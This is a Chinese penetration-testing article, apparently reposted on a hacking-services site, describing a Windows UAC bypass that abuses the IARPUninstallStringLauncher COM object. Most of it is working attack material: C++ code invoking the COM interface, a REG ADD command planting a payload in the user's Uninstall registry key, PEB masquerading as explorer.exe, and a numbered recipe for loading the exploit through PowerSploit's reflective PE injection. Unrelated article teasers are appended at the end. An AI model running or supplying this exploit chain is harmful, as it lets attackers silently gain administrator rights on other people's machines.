通过COM组件IARPUninstallStringLauncher绕过UAC

hacker4年前关于黑客接单378

  在上篇文章《通过COM组件NetFwPolicy2越权关闭防火墙》验证结论:对于explorer.exe(或是模拟成explorer.exe),加载高权限的COM组件不会弹出UAC的对话框。同时介绍了如何在注册表中寻找可以高权限运行的COM组件。

  本次将要继续,介绍另一个可供使用的COM组件。

  在我搜索到时,获得名称

  经过进一步搜索,发现ExpLife已经公开了这个COM组件的利用 *** ,地址如下:

  http://www.freebuf.com/articles/system/116611.html

  感谢ExpLife的分享,缩短了我研究的时间,所以本文将要在此基础上,侧重于分析原理和介绍更多利用方式

  本文将要介绍以下内容:

  复现通过COM组件IARPUninstallStringLauncher绕过UAC的 ***

  利用分析

  更多利用方式

  ExpLife是从寻找不会弹出UAC对话框的功能入手,通过逆向找到可供利用的COM组件

  而我的思路是先找到支持提升权限的COM组件,然后查找这个COM组件对应的功能

  两种 *** 各有利弊:

  ExpLife的 *** 需要对系统有足够了解,得找到不会弹出UAC对话框的功能

  我采用的 *** 能够找到一些不常见的COM组件,其中的功能在平时也许很难接触

  但使用Explife的 *** ,如果找到了一个功能,使用动态下断点和静态分析的 *** 对COM组件的逆向会很高效

  而我采用的 *** 只能通过注册表键值内容做一个大概的判断,需要进一步搜索才能定位具体的COM组件,效率不高

  可以将两种 *** 相结合,但最重要的一点,找到的COM组件不仅要能够提升权限,还要能够执行程序(或是其他有用的功能)才可以

  下面开始介绍利用原理:

  在之前的文章《渗透基础——获得当前系统已安装的程序列表》曾提到过 -> -> 中的程序列表对应以下注册表键值:

  高权限程序对应注册表键值

  低权限程序对应注册表键值(实际上为)

  在卸载程序时,同时会删除程序对应的注册表键值

  而我们在删除高权限的程序时,会删除下的键值,正常情况下该操作会弹出UAC对话框,但实际上并没有,这里就可以判断系统“偷偷”绕过了UAC

  如果我们能够模拟这个功能,那么也能“偷偷”绕过UAC

  注册表项Uninstall下有一个键为"UninstallString",内容为要执行的命令

  如果我们替换成payload,就能实现高权限执行,即UAC绕过并执行任意程序

  以上两点相结合,满足了通过COM组件绕过UAC的必要条件

  所以,接下来只要能够模拟卸载程序的功能即可

  逆向分析过程和模拟卸载的功能ExpLife在他的文章中已经写得很详细,不再赘述

  引用文中的分析:

  通过调用位于CARPUninstallStringLauncherCOM组件中IARPUninstallStringLauncher接口的LaunchUninstallStringAndWait *** 来实现卸载程序

  关键代码如下:

  CLSID clsid;

  IID iid;

  LPVOID ppv = NULL;

  HRESULT hr;

  PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait pfn_LaunchUninstallStringAndWait = NULL;

  PFN_IARPUninstallStringLauncher_Release pfn_IARPUninstallStringLauncher_Release = NULL;

  if (IIDFromString(L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}", &clsid) ||

  IIDFromString(L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}", &iid))

  return 0;

  CoInitialize(NULL);

  if (SUCCEEDED(hr))

  {

  pfn_LaunchUninstallStringAndWait = (PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait)(*(DWORD*)(*(DWORD*)ppv + 12));

  pfn_IARPUninstallStringLauncher_Release = (PFN_IARPUninstallStringLauncher_Release)(*(DWORD*)(*(DWORD*)ppv + 8));

  if (pfn_LaunchUninstallStringAndWait && pfn_IARPUninstallStringLauncher_Release)

  {

  pfn_LaunchUninstallStringAndWait((LPVOID*)ppv, 0, L"{18E78D31-BBCC-4e6f-A21D-0A15BBC62D49}", 0, NULL);

  pfn_IARPUninstallStringLauncher_Release((LPVOID*)ppv);

  }

  }

  CoUninitialize();

  return 0;

  其中对应注册表Uninstall下的键名称

  所以我们需要提前在注册表Uninstall下新建一个键

  由于是绕过UAC,代表我们还没有管理员权限,因此无法操作注册表

  所以只能操作注册表

  通过cmd新建注册表项,并添加payload,命令如下:

  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\payload" /v UninstallString /t REG_SZ /d "c:\windows\system32\calc.exe" /f

  实际创建的位置为,如下图

  

  注:

  如果想要自己在注册表界面新建键值进行测试,创建的位置为,而不是

  接下来,还需要做的是修改当前进程的PEB结构,欺骗PSAPI,将当前进程模拟为explorer.exe,这样就能够“偷偷”绕过UAC,不会弹框

  可供参考的地址:

  https://github.com/3gstudent/Use-COM-objects-to-bypass-UAC/blob/master/MasqueradePEB.cpp

  将以上代码整合,完整的实现代码如下:

  https://github.com/3gstudent/Use-COM-objects-to-bypass-UAC/blob/master/IARPUninstallStringLauncher.cpp

  补充:

  对于COM组件IARPUninstallStringLauncher,在执行"UninstallString"时,只有启动的程序结束以后当前进程才会自动退出

  关于更多利用方式,指的是模拟成白名单进程的 ***

  0x02的实例是修改当前进程PEB结构,将当前进程模拟为explorer.exe

  当然也可以直接用ExpLife的两个 *** :dll注入和通过rundll32加载dll

  这里再给出一个利用方式:通过Powershell调用COM组件,默认powershell.exe是可信进程,所以也不会弹出UAC的对话框

  这里需要使用powershell脚本Invoke-ReflectivePEInjection.ps1,下载地址:

  https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

  提供的一个功能是在powershell的内存中加载exe

  为了使我们的程序扩展性更强,将源代码改成支持传入参数的方式,参数为要读取的注册表项,完整代码如下:

  https://github.com/3gstudent/Use-COM-objects-to-bypass-UAC/blob/master/IARPUninstallStringLauncher(argv).cpp

  接着使用Invoke-ReflectivePEInjection.ps1封装exe,并传入参数,powershell的代码如下:

  $PEBytes = [IO.File]::ReadAllBytes('c:\ est\\IARPUninstallStringLauncher.exe')

  Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "payload"

  其中参数payload对应注册表项,其中的键"UninstallString"存储要执行的程序路径

  如下图

  

  通过powershell执行Invoke-ReflectivePEInjection.ps1,在powershell.exe的内存中加载IARPUninstallStringLauncher.exe,以高权限调用COM组件,由于powershell.exe为可信进程,所以能够直接绕过UAC

  注:

  实际测试的一个小bug,在执行完payload后,powershell进程在退出时会弹框报错,提示内存不可读,如下图

  

  一个最简单的解决 *** :

  在脚本Main函数末尾加1

  如下图

  

  完整利用方式:

  1、新建注册表,并写入要执行的程序路径,命令如下:

  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\payload" /v UninstallString /t REG_SZ /d "c:\windows\system32\calc.exe" /f

  2、编译IARPUninstallStringLauncher.exe

  源码地址:

  https://github.com/3gstudent/Use-COM-objects-to-bypass-UAC/blob/master/IARPUninstallStringLauncher(argv).cpp

  3、通过powershell脚本加载exe并传入参数,powershell命令如下:

  $PEBytes = [IO.File]::ReadAllBytes('c:\ est\\IARPUninstallStringLauncher.exe')

  Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "payload"

  注:

  原脚本Main函数末尾记得加1,防止报错

  本文介绍了通过COM组件IARPUninstallStringLauncher绕过UAC的 *** ,分享多种利用方式(修改PEB模拟成explorer.exe+以powershell.exe加载exe),得出结论:只要以(或者模拟成)可信的进程(如explorer.exe、powershell.exe),加载高权限的COM组件不会弹出UAC的对话框。

标签: 渗透测试

相关文章

飞蛾为什么扑火?飞蛾为什么这么喜欢光亮的地方

飞蛾为什么扑火?飞蛾为什么这么喜欢光亮的地方

蝴蝶是会飞的花朵,是曼妙绝伦的舞蹈家。身姿优雅、色彩斑斓的蝴蝶备受文人墨客的青睐。春天里,看到花枝上彩蝶蹁跹,诗圣杜甫的快乐跃然纸上,成就了《江畔独步寻花》:“黄四娘家花满蹊,千朵万朵压枝低。留连戏蝶...

我是复制的如何辨别黑客(黑客代码复制粘贴)

我是复制的如何辨别黑客(黑客代码复制粘贴)

本文目录一览: 1、什么是黑客? 2、怎么样才能查看到自己的电脑是否被黑客入侵、控制?谢绝复制粘贴别人的! 3、如何辨别真假黑客? 4、如何知道自己的电脑被黑客侵入了? 什么是黑客? 黑...

吉利美日牌多少钱,吉利美日汽车价格16款

  祥瑞熊猫,祥瑞熊猫自动档车几多钱?虽然是新车自动档amt 09款 1.3l 自动乐动版 4.66-5.58万 09款 1.3l 自动无敌版 4.92-5.8 可是不发起   吉甘微利美日之星1.3...

吃芹菜真的能降血糖吗 吃芹菜的好处有哪些

吃芹菜真的能降血糖吗 吃芹菜的好处有哪些

针对许多身患血压高的人而言,有多吃芹菜能协助降血脂的叫法。尽管吃芹菜是有一定的作用的。降血脂并并不是只有根据饮食疗法的方式。那麼吃芹菜确实能降血脂吗 吃芹菜的好处有什么。产生有关详细介绍。 吃芹菜...

商业化体验策略模型CXS:全视角体验设计的思维结构

商业化体验策略模型CXS:全视角体验设计的思维结构

导读:本文作者依据事情中项目实践的所思所想,分享了关于贸易化体验设计的相关常识,并把它提炼成了一个模子——CXS,作者团结案例对这个模子展开了梳理说明,供各人一同参考和进修。 聚焦贸易化体验设计的实...

个性婚礼请帖(做请柬)

个百思特网性婚礼百思特网请帖百思特网(做请柬...